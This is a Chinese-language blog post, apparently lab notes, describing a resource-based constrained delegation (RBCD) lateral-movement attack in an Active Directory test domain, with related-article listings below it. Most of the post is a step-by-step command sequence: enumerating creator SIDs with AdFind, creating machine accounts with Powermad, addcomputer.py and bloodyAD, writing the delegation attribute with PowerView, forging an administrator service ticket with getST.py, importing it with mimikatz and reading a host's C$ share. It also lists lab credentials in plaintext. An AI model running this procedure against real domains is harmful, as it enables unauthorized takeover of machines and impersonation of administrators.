基于资源委派的横向移动

已于 2024-05-25 00:57:17 修改
阅读量562 收藏 12
点赞数 13
文章标签: 笔记 安全
于 2024-05-24 22:27:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L2054996150/article/details/139174829
版权

基于资源委派的横向移动


基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。
所以核心就是谁或什么权限能修改msDS-AllowedToActOnBehalfOfOtherIdentity

环境搭建

域控:
dc.xiaodi.local
windows2012
192.168.3.33
administrator/Admin123456

域内成员主机:
data.xiaodi.local
windows2008
192.168.3.22
administrator/admin!@#45
xd\dbadmin/admin!@#45

域内成员主机:
dc.xiaodi.local
windows7
192.168.3.11
administrator/admin!@#45
xd\dbadmin/admin!@#45

通过管理主机加入域的用户拿下主机

产生于一个账号登录多台电脑
利用过程:
假设此时已经获得win7的权限让win7上线cs进行命令操作。
此时通过cs上传AdFind.exe通过他进行查询是否具有利用条件。
ALT
由此可见web和data两个用户同时具有一个sid此时可以通过资源约束进行横向移动拿下win2008的权限

查询被域用户创建的机器账户列表:

shell AdFind.exe -b "DC=xiaodi,DC=local" -f "(&(samAccountType=805306369))" cn mS-DS-CreatorSID

根据查询出来的sid找出对应的用户名:

shell AdFind.exe -b "DC=xiaodi,DC=local" -f "(&(objectsid=S-1-5-21-1695257952-3088263962-2055235443-1104))" objectclass cn dn

创建机器账户

使用PowerMad工具创建机器账户

将Powermad.ps1上传至目标服务器也可以利用工具进行新增机器账号

powershell Import-Module .\Powermad.ps1;New-MachineAccount -MachineAccount serviceA -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force)

使用addcpmputer创建机器账户

python addcomputer.py xiaodi8.com/web2016:Xiaodi12345 -method LDAPS -computer-name test01\$ -computer-pass Passw0rd -dc-ip 192.168.139.11

使用bloodyAD工具创建机器账户

python bloodyAD.py -d redteam.lab -u web2016 -p 'Xiaodi12345' --host 192.168.139.11 addComputer test01 'Passw0rd'

利用新增账号更改msDS-AllowedToActOnBehalfOfOtherIdentity值

上传PowerView.ps1执行

powershell Import-Module .\PowerView.ps1;Get-NetComputer serviceA -Properties objectsid

得到当前新增sidALT
修改机器的委派属性

powershell import-module .\powerview.ps1;$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1695257952-3088263962-2055235443-1602)";$SDBytes = New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0);Get-DomainComputer datax| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

需要更改sid值和主机名

利用修改后的属性申请目标请求票据后导入利用

修改datax主机委派属性:

powershell import-module .\powerview.ps1;$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1695257952-3088263962-2055235443-1602)";$SDBytes = New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0);Get-DomainComputer data| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

挂个代理到192.168.3.*
本地执行getST.py 获取票据

python getST.py -dc-ip 192.168.3.33 xiaodi.local/serviceA\$:123456 -spn cifs/datax.xiaodi.local -impersonate administrator

导入票据到内存:

mimikatz kerberos::ptc administrator.ccache

连接利用票据:

shell dir \\data.xiaodi.local\c$

资源约束委派-Acount Operators组

原理:
Acount Operators组成员可修改域内任意主机的
ALT

查询Acount Operators组成员:

shell adfind.exe -h 192.168.3.33:389 -s subtree -b CN="Account Operators",CN=Builtin,DC=xiaodi,DC=local member

后续既可以同上从创建机器账户开始
感谢迪总教的好大家关注一下链接: http://xiaodi8.com/

冲动就白给
关注
使用bloodyAD对域属性进行查询与修改
谢公子的博客
09-05 919
bloodyAD是一款功能强大的域内信息查询、修改、权限提升的工具。该框架支持NTLM和Kerberos身份验证,并绑定到域控制器的LDAP/LDAPS/SAMR服务,以获得AD信息。
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&RBCD资源&Operators组成员&HTLMRelay结合
HACKONE的博客
06-23 426
基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。所以核心就是谁或什么权限能修改msDS-AllowedToActOnBehalfOfOtherIdentity。
基于资源的约束委派
mingyqf的博客
02-23 858
参考:https://blog.csdn.net/nicai321/article/details/122679357 原理: 基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。 漏洞复现: 资
域渗透之基于资源的约束委派
qq_56426046的博客
11-15 505
REDTEAM\hack -> WriteProperty(将机器加入域的账号,也就是mS-DS-CreatorSID属性中的账户) NT AUTHORITY\SELF -> WriteProperty(机器账户自身也可以修改) 我们再回顾一个知识点,默认域控的ms-DS-MachineAccountQuota属性设置允许所有域用户向一个域添加 多达10个计算机帐户,就是说只要有一个域凭据就可以在域内任意添加机器账户。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定 谁可以被委派来控制我。
域渗透委派攻击之基于资源的约束委派
Longwaer
01-25 1354
学习委派攻击,了解掌握基于资源的约束委派原理及利用方式。
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 1515
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
内网横向移动资源约束委派
剁椒鱼头没剁椒的博客
08-07 618
其实总体来说,约束委派类,不是太经常遇到,同时在操作过程中,还有很多是需要交互的,或者一些特殊的操作,其中有一点不对则无法利用成功,不像其他漏洞,能不能利用基本上测试一下就能确定了,而这个有可能测试完也无法成功,上面案例中能够测试成功,均是在理想化环境中测试。
横向移动技术研究
不忘初心,护天下安全!
06-05 278
横向移动(lateral movement)已成为需要留意的主要威胁之一。成功的横向移动攻击可以使攻击者闯入用户现有系统,并访问系统资源横向移动攻击充分体现了“网络安全链的强度完全取决于最薄弱的那一环”这一观点。高级持续性威胁(APT)是横向移动带来的最常见网络攻击类型。如果网络有足够多未加保护的漏洞,只要有足够的时间,黑客最终就可以访问域控制器本身,进而可以攻击企业的整套数字基础设施,包括根账户。横向移动攻击的特点是,黑客利用在某个点非法获取的网络访问权,收集系统其他部分的信息并实施攻击活动。这包括访问
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用
HACKONE的博客
06-23 339
机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。
内网安全——横向移动&非约束委派&约束委派&资源的约束委派
m0_61506558的博客
02-18 683
委派攻击分类:1、非约束性委派2、约束性委派3、基于资源的约束性委派横向移动-原理利用约束委派非约束委派
非约束委派攻击原理与利用
内心不种满鲜花就会长满杂草
04-07 5494
在Kerberos认证体系中,用户通过票据(如TGT和ST)来访问服务。TGT(Ticket-Granting Ticket)是用户向密钥分发中心(KDC)请求并获得的,用于后续请求服务票据(ST)。ST则是用户访问特定服务时所需的票据。
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&NTLM中继&Relay重放&SMB&EWS&LADP协议&强制认证&钓鱼监听
最新发布
HACKONE的博客
06-25 164
NTLM Relay其实严格意义上并不能叫NTLM Relay,而是应该叫 Net-NTLM Relay。它是发生在NTLM认证的第三步,在 Type3 Response消息中存在Net-NTLM Hash,当攻击者获得了Net-NTLM Hash后,可以进行中间人攻击,重放Net-NTLM Hash,这种攻击手法也就是大家所说的NTLM Relay(NTLM 中继)攻击。2、利用Net-NTLM Hash中继攻击(Net NTLM Hash相同)#横向移动-NTLM中继-暴力破解&Relay攻击。
探索BloodyAD:一款创新的广告过滤工具
gitblog_00058的博客
04-25 371
探索BloodyAD:一款创新的广告过滤工具 bloodyADBloodyAD is an Active Directory Privilege Escalation Framework项目地址:https://gitcode.com/gh_mirrors/bl/bloodyAD 是一个开源项目,旨在帮助用户在浏览网页时有效拦截烦人的弹窗和侵入式广告,提供更干净、更流畅的网络体验。项目采用先进的...
基于windows中委派的攻击思路(下)-基于资源的约束性委派
热门推荐
Shanfenglan's blog
12-16 4万+
文章目录1. 前言2. 技术点2.1 利用原理:那么如何获得一个机器账户呢?如何获得一个有权利修改msDS-AllowedToActOnBehalfOfOtherIdentity?3. 利用过程:1. 利用powermad添加机器账户:2. 查询添加的机器账户的sid3. 修改msDS-AllowedToActOnBehalfOfOtherIdentity:3.1 win server 2012以上:3.2 win server 2012以下:4. 利用rubues获取票据5.利用impacket 1. 前
基于资源的约束委派攻击
内心不种满鲜花就会长满杂草
04-13 2200
首先,在传统的约束委派中,情况是这样的:有一个服务账户(比如一个Web服务器),它被配置为可以代表某个用户(比如一个域用户)去访问另一个服务(比如数据库)。这就像是你给了你的秘书(服务账户)一张你的身份证(用户的凭证),让她去帮你办点事(访问数据库)。
域渗透——基于资源的约束委派利用
a3320315的博客
07-03 1873
环境 域: test.com 域控:Windows server 2012R2, 主机名: AD, IP: 192.168.1.7 委派的域内主机:系统:win2008R2,主机名:win2008,ip:192.168.1.24 域内普通用户: test,对win2008有写的权限 域内普通用户: test1 攻击机器:系统:win2019 ip:192.168.1.19 登录用户为test1 设置test的写权限 验证test这个用户对win2008是否具有写权限,可以使用PowerView枚举w
基于资源的约束委派(RBCD)学习
whojoe的博客
07-21 3237
基于资源的约束委派(RBCD)学习原理环境搭建利用添加机器账户中继&委派无另一台机器权限有另一台机器权限参考文章 原理 环境搭建 主机 机器名 ip 用户 密码 版本 域控 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 域内机器 user.test.com 192.168.164.129 user1 Uu1234. win2008r2 域内机器 user2.test.com 192.168.164.150
横向移动
wei_43990108的博客
04-20 5279
横向移动 横向移动—APT Windows横向移动攻击的检测 https://www.4hou.com/technology/10430.html 概述 横向移动技术广泛应用于复杂的网络攻击中,特别是高级持续性威胁(APT)。攻击者使用这些技术访问受感染系统中的其他主机,并访问敏感资源(如邮箱,共享文件夹或凭证)。这些可以用于渗透其他机器、权限提升或者窃取更有价值的凭证。通过横向移动攻击最终可...
【内网安全横向移动-域渗透之资源约束委派
今天是几号的博客
04-06 919
基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。计算机加⼊域时,加⼊域的域⽤户被控后也将导致使用当前域用户加入的计算机受控。
非约束委派攻击
blue_fantasy的博客
01-20 3146
Text. 0x00 原理 用户想访问服务A,于是向KDC提交认证,KDC发现A是非约束性委派,于是会把TGT放在ST中一并给用户。然后用户用这个ST去访问服务A,服务A就相当于获得了用户的TGT,把TGT放入lsass进程,然后就可以拿着用户的TGT以用户的身份去访问所有用户权限能够访问的服务了。 0x01 非约束委派的启用 找到Active Directory用户和计算机->Computers。给域内机器WIN7配置非约束委派 右键属性->委派->信任此计算机来委派任何服
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值